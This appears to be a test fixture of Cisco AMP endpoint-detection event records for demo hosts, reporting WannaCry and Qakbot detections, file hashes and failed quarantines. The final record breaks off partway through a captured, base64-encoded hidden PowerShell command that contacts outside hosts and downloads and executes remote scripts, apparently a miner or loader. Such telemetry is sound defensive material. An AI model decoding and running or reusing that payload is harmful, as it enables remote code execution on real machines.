+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4